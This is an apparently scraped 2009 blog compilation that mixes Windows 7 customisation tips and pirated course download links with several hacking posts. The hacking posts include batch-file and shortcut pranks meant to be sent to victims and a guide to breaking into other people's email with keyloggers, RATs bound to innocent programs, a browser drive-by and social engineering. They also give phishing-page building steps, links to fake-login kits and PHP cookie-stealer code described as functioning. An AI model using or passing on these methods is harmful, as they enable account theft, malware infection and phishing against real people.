Saturday, September 19, 2009

Download 7500 Mouse Pointers for Windows 7 – For Free!

We should start customizing Windows 7 a little bit more. We have already a lot of themes, but no good mouse pointers or icons for our desktop.

Btw, we are also working on a theme that replaces the Windows 7 shell, so stay tuned!

Anyway, CursorMania offers a great set of 7500 mouse pointers for Windows 7.

But first let’s take a look how we can change mouse pointers in Windows 7.

Changing Mouse Pointers

Right-click on your desktop and click on “Personalize”. Next, you will see something like that:

How to change mouse pointers?

How to change mouse pointers in Windows 7?

Click on “change mouse pointers”.

Replace Windows 7 Default Mouse Pointers

Next, select a mouse gesture and click on browse. After that you got to browse to the location where you saved all your mouse pointers and cursors:

Selecting Lightsaber Mouse Pointer

Selecting "Lightsaber Mouse Pointer"

In this example I am replacing the mouse gesture “Normal Select” with “Lightsaber Normal Select”. Should be pretty obvious what you have to do next, you got to assign all mouse pointers manually and then save it as a new “scheme”.

To get a lightsaber mouse pointer and many more, you should download CursorMania:

Click here to download over 7500 free cursors

Mouse Pointers for Windows 7

Mouse Pointers for Windows 7

Can’t activate Windows 7 properly! (slui.exe – 0×80072EE2)

Ok, you have problems to activate Windows 7, right?

Either you are getting the error code 0×80072EE2 or the system can’t find your slui.exe (the exe that is required to activate win7).

I have a solution!

If you are running the AVG (best choice so far) firewall it will block the slui.exe and you will not be able to activate Windows 7. To disable the firewall process you need admin privileges.

First of all you will have to learn how to activate the hidden administrator account in Windows 7:

Activating the hidden admin account

Goto “Start” and enter “cmd” into the search

field.Do not just hit enter. Hold CTRL + Shift and hit Enter! That’s the shortcut to run this as an admin.

Enter the command you can see above:
net user administrator /active:yes

This will activate the hidden admin account.

Switch Users

Simply switch the user account now (Start – select from pulldown menu “shutdown” -> “switch users”.) and you will see the admin account!

Click on the admin icon to switch to that user. Once you are logged in you can disable your firewall which blocked the slui.exe!

Disabling the firewall service

Open the task-manager. Select the tab “services” and locate the AVG firewall service by hitting the key “a” several times. Search for AVGfws8 – right-click -> turn it off.

Activating Windows .. finally

Now open the cmd.exe again (as described above) and enter “slui.exe” to run it. Activate Windows. Done!

Allow Windows 7 Themes To Change Mouse Pointers

Some themes that you will be able to download from our site will change the mouse pointers of Windows 7.
However, sometimes you might not want to use the mouse pointers of the theme but your very own pack of mouse pointers.

How would you do that?

There’s an easy solution. You can simply block the mouse pointers and disallow themes to change any mouse pointers at all!

Simply right-click on your desktop and click on “Personalize”. Next, select “Change Mouse pointers” and uncheck the following option:
“Allow themes to change mouse pointers”.

Block Mouse Pointers

Block Mouse Pointers

If you were not able to find the mouse pointer options, simply read this short guide about Windows 7 Mouse Pointers.

How to stop someone's internet access

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig

ShutDown PC million Times

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a
enjoy it

Freeze someone's desktop

this is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name
6.now go to desktop & select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window.
7.now to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to desktop and select Browse, select the file that u saved then press appply then ok. now to remove the windows taskbar, right click on the taskbar and go 2 properties, then select autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!

Hope You Destroy Yor Victims PC {REMEMBER DO NOT CLICK BATCH}! {FOR FOOLS AND NOOBS}

Google Blogger Essential Training

Google Blogger Essential Training
by: Molly E. Holzschlag / Lynda.com




Product Description:

Blogger Essential Training with Molly E. Holzschlag is a movie-based workshop for audiences new to blogging and to the newly revamped Blogger weblog service, a free service from Google. Begin by learning what blogs are and the various ways they can be used. You'll quickly get into setting up your weblog, adding specialty features such as comment systems and news-feeds, working with and customizing templates, and even creating team blogs and audio blogs. The included exercise files, articles, and resources enhance the title, allowing you to follow along with the movies and learn at your own pace.



MEGAUPLOAD - The leading online storage and file delivery service
MEGAUPLOAD - The leading online storage and file delivery service
MEGAUPLOAD - The leading online storage and file delivery service
MEGAUPLOAD - The leading online storage and file delivery service
MEGAUPLOAD - The leading online storage and file delivery service

Mirrors :

RapidShare: 1-CLICK Web hosting - Easy Filehosting
RapidShare: 1-CLICK Web hosting - Easy Filehosting
RapidShare: 1-CLICK Web hosting - Easy Filehosting
RapidShare: 1-CLICK Web hosting - Easy Filehosting
RapidShare: 1-CLICK Web hosting - Easy Filehosting

Info : Course: Java 2: Graphics Author: Arthur Griffith SKU: 33537 ISBN: 1-932808-11-6 Release Date: 2004-09-17 Duration: 6 hrs / 74 tutorials



Info
:
Course: Java 2: Graphics
Author: Arthur Griffith
SKU: 33537
ISBN: 1-932808-11-6
Release Date: 2004-09-17
Duration: 6 hrs / 74 tutorials
Work Files: Yes
Details:
Java is a simple, scalable object oriented, general purpose programming language with a multitude of uses. With the power to develop everything from simple graphics and web animations, to high-end business applications that program hand-held devices, microwaves, cross platform server applications and more, it's no wonder why Java is on everyone's mind. In this, the second in a series of Java courses offered by VTC, Java expert, Arthur Griffith, uses practical examples to demonstrate Java programming as it applies to the creation and manipulation of graphic objects. The source code is also provided, so the user can follow right along. To begin learning learning today, simply click on one of the Java 2: Graphics lessons.

Title Description

Introduction
Course Introduction (04:14)
Course Overview (04:37)

Getting Started
Where to Get Java (05:00)
The Command Line Installation (04:59)
Writing and Compiling a Program (05:10)
The Mainline (06:16)

The Graphics Object and Colors
The Graphics Class (05:28)
The Graphics2D Class (04:46)
The Coordinate System (03:37)
Filling a Window with Color (05:39)
Inventing a Color of Your Own (05:14)
Shading Up and Down (05:40)
A Color Gradient (05:11)
Color Gradient Directions (03:11)
Cyclical Color Gradient (03:03)

Positioning/Sizing/Rotating
Polygon (04:53)
Translate and Rotate (05:08)
Circling (06:29)
Scaling (04:33)
Shearing (03:18)
The Affine Transform (07:01)

Fundamental Drawing
A Random Drawing (05:14)
Arcs (06:31)
Rounded Rectangles (04:40)
Basic Line Drawing (05:56)
Corners and Ends (03:12)
Dashed Lines (06:10)

Fundamental Fonts
Font Measuring (05:14)
Positioning Text (07:18)
Font List (04:49)

Image Files
Loading Image Files (06:31)
Scaling (04:36)
Types of Scaling (03:45)
Pixel by Pixel pt. 1 (04:27)
Pixel by Pixel pt. 2 (04:05)
Convolving pt. 1 (04:35)
Convolving pt. 2 (04:26)
Transformation pt. 1 (05:54)
Transformation pt. 2 (02:43)
Compositing (07:15)
Cross Fading (04:46)

The Mouse and Keyboard
Reading Mouse Events (06:13)
Mouse Motion (03:27)
All Mouse Events (06:44)
Reading Keyboard Events (05:16)
Selecting a Mouse Cursor (04:28)
Dragging Objects (06:08)
Dragging Solid Objects (03:32)
Rubberbanding (04:33)

Making Shapes and Fitting Curves
Building a Rectangle with GeneralPath (03:30)
Scaling and Zig Zagging (04:18)
The Winding Rule (04:17)
Quadratic Curves (03:01)
Asymmetric Quadratic Curves (02:33)
Cubic Curves (03:47)
Asymmetric Cubic Curves (03:15)
Attaching Shapes with GeneralPath (04:34)
Combining Shapes with GeneralPath (03:22)
Combining Shapes with an Area Object (05:13)
Crop Image (03:13)
Filling an Area (04:33)

Fitting Text
Ways of Displaying Text pt. 1 (05:46)
Ways of Displaying Text pt. 2 (02:54)
Positioning Text (05:43)
Text Attributes (04:45)
Drawn Letters (03:07)
Letters with Pictures (04:27)
Dynamic Resizing of Text (04:46)

Stupid Animation Tricks
Flicker (07:04)
No Flicker (03:57)
No Flicker Applet (04:12)
Pong and Electrons pt. 1 (05:02)
Pong and Electrons pt. 2 (03:06)

Credits
About this Author (02:29)

Download :
Code:
http://www.megaupload.com/?d=EYG0WG36

How to Break Into Email Accounts

Disclaimer :

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!



This is a Genuine Article.

Will try to add in as much as possible
keep posting !
comment on this article !


Introduction



I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.


Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...


Things You Should Know



As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.


If You Have Physical Access



I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out Google to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at Keylogger download - free keylogger - "Perfect Keylogger" - invisible Vista key logger. Download the best PC monitoring spy software - free key logger. Stealth key logger for parents!). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on Zeropaid.com - if it's free it's for me! for different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahb lah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....


v. download free




Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...



If You Don't Have Physical Access




Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to Google, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


PhP IP Client Logger by Kevin Leonardi


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

IF YOU LIKE THIS POST PLEASE SAY THANKS

Create a server envorinment [video tut]

Create a server envorinment [video tut]



Quote:
Create A Server Environment On Your PC
English
FLV Videos
30 minutes
Year 2009
88 MB
Code:
http://hotfile.com/dl/12864915/a01eea3/ServerEnvironment.zip.html
Code:
http://rapidshare.com/files/281740543/ServerEnvironment_warezlegend.org.zip.html

Create Fake login page

Create fake login pages in 15 steps

{1} Open JotForm - Easiest Form Builder and Sign Up.


{2} Then Login there with your newly registered account.

{3} Now click on ' Create your first form'.

{4} Now delete all the pre-defined entries, just leave 'First Name:'. (To delete entries, select the particular entry and then click on the cross sign.)

{5} Now Click on 'First Name:' (Exactly on First Name). Now the option to Edit the First Name is activated, type there "username:" (for gmail) or YahooId: (for Yahoo)

{6} Now Click on 'Power Tool' Option (In right hand side...)

{7} Double click on 'PasswordBox'. Now Click the newly form password entry to edit it. Rename it as 'Password:'

{8} Now Click on 'Properties' Option (In right hand side...). These are the form properties. {9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.

{10} Now in ThankYou URL you must put some link, like Google or anything. Actually after entering username & password, user will get redirect to this url.(Don't leave it blank...)

{11} Now Click on 'Save'. After saving, click on 'Source' Option.

{12} Now you can see two Options, namely 'Option1' & 'Option2'. Copy the full code of 'Option2'.

{13} Now open Notepad text editor and write the following code their.




Paste the Option2 code here



{14} And now save this as index.html. Now we have to put this index.html on internet. I mean now we are going to host this file. For this we will use FREE hosting provider service. You can try the following FREE hosting providers. Make a free hosting account and come back here...


Free Hosting, Free Web Hosting, Free hosting, Free ASP Hosting
ATSPACE.COM - Your Web Hosting Choice

{15} I hope u have succesfully created a free hosting account. Now Login in your hosting account. And then Open 'File Manager'.

{16} Upload this index.html there... now u can see your index.html online by typing the url (url will be given to you by your free hosting provider..)
FINISHED

IF YOU LIKE THIS POST PLEASE SAY THANKS

Fake Login scripts and tools

Perfect fake login pages


Fake Login scripts and tools

Fack login pages hacks password of the victim when he logs in to the software using his id. This tool sends the victim`s id & password to your yahoo id or Google that you specify in the tool.

Darfun Incorporation - Software Research Portal made a fake login pages for Yahoo!, Hotmail/MSN, Orkut, MySpace, Rediff mail, Hi5, Friendster

Those fake login pages are like photo copy of real pages, hats off to Darfun Inc,
this is the link for the pages to download fack login pages

Yahoo Fake login script
Hotmail/MSN Fake login script
Orkut login script
Myspace Fake login script
Rediff mail Fake login script
Hi5 Fake login script
Friendster Fake login script

IF YOU WANT TO USE FAKE LOGIN FOR ANY OTHER SERVICE
Just fallow the instructions on the Readme.txt and Howto.txt in zip file


sumit8510 says:
THIS HELP IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY,
WE ARE NOT RESPONSIBLE OF ANY PASSWORD THEFT USING THIS
FAKE LOGIN PAGE, We also apologies to the third party for
using their e mail form in this script.

After downloading the zip file just change the Html as instructed in help files and upload the edited file and publish it like this :

Create Fake login page


IF YOU LIKE THIS POST PLEASE SAY THANKS



How to make cookies and hack Orkut accounts

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail(" me@mydomain.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ", "Cookie stealer report", $cookie); // line 3
?> // line 4


Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to " me@mydomain.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it " with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

IF YOU LIKE THIS POST PLEASE SAY THANKS


Create a Custom Boot Logo for Windows Vista

If you are a desktop customization kinda guy, one of the first things you'll want to figure out is how to create a customized boot logo. There's a little utility that you can use to create the boot logo formats.
First you'll need to download the
Code:
Quote:
Vista Boot Logo Generator 1.1
utility, which we'll use to create the correct logo image type. Once it's installed, you need to make sure that you run the application as administrator:





Choose two versions of the image, one needs to be 800×600 at 24 bit color, and the other 1024×768 at the same color depth. Both files must be in Bitmap(BMP) format. Save the file somewhere like your desktop, because we can't yet copy directly to the correct directory, until we take ownership of the file.

To take ownership of the file, you'll have to open an administrator command prompt. (type cmd into the start menu search box, and hit Ctrl+Shift+Enter), and then run this command:
takeown /f C:\Windows\System32\en-US\winload.exe.mui
Now run this command, substituting username for your username:
cacls C:\Windows\System32\en-US\winload.exe.mui /G username:F
Now copy the file that you created into the C:\windows\system32\en-US\ directory. Make sure you choose the overwrite option.
Now you'll need to use the msconfig utility. Just type msconfig into the start menu search box, and then click the Boot tab:



Check the "No GUI boot" option, and we're all ready to reboot and test it out. Sweet!